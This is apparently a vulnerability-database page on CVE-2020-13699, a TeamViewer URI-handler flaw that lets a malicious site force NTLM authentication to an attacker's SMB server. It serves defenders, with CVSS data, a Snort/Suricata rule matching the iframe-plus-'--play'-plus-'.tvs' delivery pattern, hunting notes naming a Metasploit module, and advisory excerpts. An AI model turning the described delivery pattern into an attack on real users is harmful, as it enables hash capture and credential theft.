CVE-2020-13699
published 2020-07-29CVE-2020-13699: TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary…
PriorityP272high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
25.90%
97.7th percentile
TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| teamviewer | teamviewer | < 15.8.3 | 15.8.3 |
Detection & IOCsextracted from sources · hover to see the quote
filename.tvs
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)"; flow:established,to_client; http.response_body; content:"<iframe|20|"; content:"|20|src="; distance:0; pcre:"/^[\x22\x27]t(?:eamviewer(\d+|api)|v(c(hat|ontrol)|filetransfer|joinv|present|s(endfile|q(customer|support))|v(ideocall|pn))\d)/R"; content:"|3a 20|--play"; distance:0; fast_pattern; content:".tvs"; distance:0; reference:url,www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/; classtype:attempted-admin; sid:2030668; rev:2; metadata:attack_target Client_Endpoint, created_at 2020_08_10, cve CVE_2020_13699, deployment Perimeter, confidence High, signature_severity Major, tag Teamviewer, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_07;)
- →Only Firefox can be exploited by this vulnerability, as all other browsers encode the space after 'play' and before the SMB location, preventing successful exploitation. Target detection/hunting to Firefox user-agent sessions invoking TeamViewer URI handlers. ↗
- →Detect HTTP responses containing an iframe with a TeamViewer custom URI scheme (teamviewer10, teamviewerapi, tvchat1, tvcontrol1, etc.) followed by '--play' and a '.tvs' file reference — the canonical exploit delivery pattern.
- →The attack forces an outbound SMB connection from the victim to an attacker-controlled IP to capture or relay NTLM authentication hashes. Monitor for unexpected outbound SMB (port 445/139) connections triggered from browser processes. ↗
- →The Metasploit module 'auxiliary/server/teamviewer_uri_smb_redirect' implements this attack; presence of this module's traffic pattern or its use in logs is a strong indicator of active exploitation. ↗
- ·Exploitation requires the victim to be using Firefox; other browsers URL-encode the space in the URI, breaking the attack chain. ↗
- ·The Snort/ET rule (sid:2030668) inspects HTTP response bodies for the iframe+URI+--play+.tvs pattern; it will not fire on HTTPS traffic unless TLS inspection is in place.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
VISAM VBASE Editor
cisa_ics·2021-11-09·CVSS 7.4
[HIGH] VISAM VBASE Editor
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
VISAM VBASE Editor
Last RevisedNovember 09, 2021
Alert CodeICSA-21-308-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 7.4
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: VISAM
- Equipment: VBASE
- Vulnerabilities: Improper Access Control, Cross-site Scripting, Improper Restriction of XML External Entity Reference, Using Components with Known Vulnerabilities
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities may allow un-neutralized user-controllable data input, disclosure of local files, access to NTLM (Windows New Technology LAN Manager) hashes
GHSA
GHSA-f43w-mfrf-mv66: TeamViewer Desktop for Windows before 15
ghsa_unreviewed·2022-05-24
CVE-2020-13699 [MEDIUM] CWE-428 GHSA-f43w-mfrf-mv66: TeamViewer Desktop for Windows before 15
TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
Suricata
ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)
suricata·2020-08-10·CVSS 8.8
CVE-2020-13699 [HIGH] ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)
ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT TeamViewer .tvs iFrame Observed (CVE-2020-13699)"; flow:established,to_client; http.response_body; content:"<iframe|20|"; content:"|20|src="; distance:0; pcre:"/^[\x22\x27]t(?:eamviewer(\d+|api)|v(c(hat|ontrol)|filetransfer|joinv|present|s(endfile|q(customer|support))|v(ideocall|pn))\d)/R"; content:"|3a 20|--play"; distance:0; fast_pattern; content:".tvs"; distance:0; reference:url,www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/; classtype:attempted-admin; sid:2030668; rev:2; metadata:attack_target Client_Endpoint, created_at 2020_08_10, cve CVE_2020_13699, deployment Perimeter, confidence High, signature_severity
2020-07-29
Published